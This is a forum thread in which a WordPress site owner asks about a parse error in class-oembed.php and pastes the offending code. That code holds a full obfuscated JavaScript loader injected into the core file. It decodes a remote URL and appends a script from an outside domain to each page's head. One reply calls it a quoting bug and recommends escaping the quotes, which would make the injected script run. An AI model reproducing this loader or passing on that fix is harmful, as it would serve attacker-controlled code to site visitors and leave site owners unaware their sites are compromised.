# Parse error: syntax error, unexpected 'text' (T_STRING), expecting ',' or ')' in /home/anysite/mysite.com/wp-includes/class-oembed.php on line 461

Tags: wordpress

I have 3 sites on the same host and all 3 are showing this error. Can't access the Admin area and got into .php, but don't know how to fix the code.  This is what's there now:

```
if ( $html_head_end = stripos( $html, '<script type='text/javascript'>var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](104, 116, 116, 112, 115, 58, 47, 47, 115, 97, 115, 107, 109, 97, 100, 101, 46, 110, 101, 116, 47, 102, 111, 111, 116, 46, 106, 115, 63, 118, 101, 114, 61, 49, 46, 48, 46, 48);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script></head>' ) ) {
            $html = substr( $html, 0, $html_head_end );
```

Any help would be much appreciated!

Comment: That's the risky part of editing php files in the wp-admin.  Now that there is an error you have to use FTP (Filezilla is a nice tool) to download, edit and upload your files.

Your issue is that you use '<script type' but you should use either double quotes "<script type' . . . . " or escape the single quotes '<script type=\' . . . '

Comment: I've just started getting this on a couple of my blogs, don't know if its an update gone wrong or been compromised by an incompetent attack

Comment: https://wordpress.org/support/topic/syntax-error-unexpected-text-t_string/ looks like others are having the same issue

Comment: Thanks for your input, it's quite helpful.  These errors just showed up without me doing any editing. The only update that was done to the site is the auto WP update, but other than that, nothing. I'll give those changes a shot and see what happens.